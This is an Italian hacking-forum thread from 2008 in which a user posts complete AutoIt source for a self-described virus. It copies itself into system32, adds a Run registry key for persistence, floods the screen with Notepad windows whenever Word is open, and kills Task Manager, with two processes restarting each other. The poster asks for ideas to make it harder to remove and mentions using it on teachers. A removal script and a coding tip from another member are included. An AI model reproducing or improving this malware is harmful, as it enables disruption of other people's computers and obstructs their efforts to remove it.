Xhack

Un forum dedicato all'hacking
 
IndiceIndice  PortalePortale  CalendarioCalendario  FAQFAQ  CercaCerca  RegistratiRegistrati  Lista UtentiLista Utenti  GruppiGruppi  Accedi  

Condividere | 
 

 Virus - Se apri Word....

Vedere l'argomento precedente Vedere l'argomento seguente Andare in basso 
AutoreMessaggio
Lord_Blackout
apprendista
apprendista


Numero di messaggi : 15
Data d'iscrizione : 31.01.08

MessaggioTitolo: Virus - Se apri Word....   Mar Feb 05, 2008 2:58 am

Ho creato questa specie di virus tanto per esercitarmi un po' in autoit, non sono un lamer e non lo userò mai contro qualcuno (eccetto le mie prof Laughing)
Il virus è composto da 3 files, uniti insieme con iexpress:

START.exe
Codice:
#NoTrayIcon
FileCopy("virus.exe", "C:\WINDOWS\system32\")
FileCopy("antitask.exe", "C:\WINDOWS\system32\")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "AutoAvvio", "REG_SZ", "C:\WINDOWS\system32\virus.exe")
Run("C:\WINDOWS\system32\virus.exe")

virus.exe
Codice:
#NoTrayIcon
If ProcessExists("antitask.exe") Then
   Sleep("100")
Else
   Run("C:\WINDOWS\system32\antitask.exe")
EndIf
While 1 = 1
   If ProcessExists("word.exe") Then
      
                While 1 = 1
                Run("notepad.exe")
                WEnd

   ElseIf ProcessExists("antitask.exe") Then
      Sleep("100")

   Else
      Run("C:\WINDOWS\system32\antitask.exe")
      EndIf
   EndIf
WEnd

antitask.exe
Codice:
#NoTrayIcon
while 1 = 1
   ProcessClose("taskmgr.exe")
   If ProcessExists("virus.exe") Then
      Sleep("100")
   Else
      Run("C:\WINDOWS\system32\virus.exe")
   EndIf
WEnd

Nonostante non sia possibile utilizzare il taskmanager, alcuni firewall permettono di chiudere i processi, ecco quindi che si rigenerano a vicenda.
E poi, basta eliminare la chiave di registro e riavviare il pc per disabilitarlo.
Se avete altre idee per renderlo meno estirpabile (infatti se col firewall mettiamo i processi in quarantena si riesca ad estirparlo) lo dica pure Very Happy

P.S.
Ecco il file di antidoto:
Codice:
ProcessClose("antitask.exe")
ProcessClose("virus.exe")
FileDelete("D:\WINDOWS\system32\virus.exe")
FileDelete("D:\WINDOWS\system32\antitask.exe")
RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "AutoAvvio")
Tornare in alto Andare in basso
Vedi il profilo dell'utente
darkphantom
hack-member
hack-member
avatar

Numero di messaggi : 398
Data d'iscrizione : 03.09.07

MessaggioTitolo: Re: Virus - Se apri Word....   Mar Feb 05, 2008 4:21 pm

perchè metti sleep("100")? (che tra l'altro dovrebbe essere sleep(100))
fai prima a scrivere:
Codice:

If Not ProcessExists("taskmgr.exe")
Tornare in alto Andare in basso
Vedi il profilo dell'utente
Lord_Blackout
apprendista
apprendista


Numero di messaggi : 15
Data d'iscrizione : 31.01.08

MessaggioTitolo: Re: Virus - Se apri Word....   Mar Feb 05, 2008 7:16 pm

ah grazie, non la conoscevo questa funzione...
mo aggiusto
Tornare in alto Andare in basso
Vedi il profilo dell'utente
Contenuto sponsorizzato




MessaggioTitolo: Re: Virus - Se apri Word....   

Tornare in alto Andare in basso
 
Virus - Se apri Word....
Vedere l'argomento precedente Vedere l'argomento seguente Tornare in alto 
Pagina 1 di 1
 Argomenti simili
-
» Come inserire l'apice e/o il pedice su Word 2007
» Come cambiare la lingua a Word 2007
» Nuovo virus della "Polizia Postale". Spiegazione su cosa realmente è, e come rimuoverlo.
» Come creare un sommario con Microsoft Word
» Widget per la scansione di virus in una pagina web

Permessi di questa sezione del forum:Non puoi rispondere agli argomenti in questo forum
Xhack :: Programmazione :: Autoit-
Andare verso: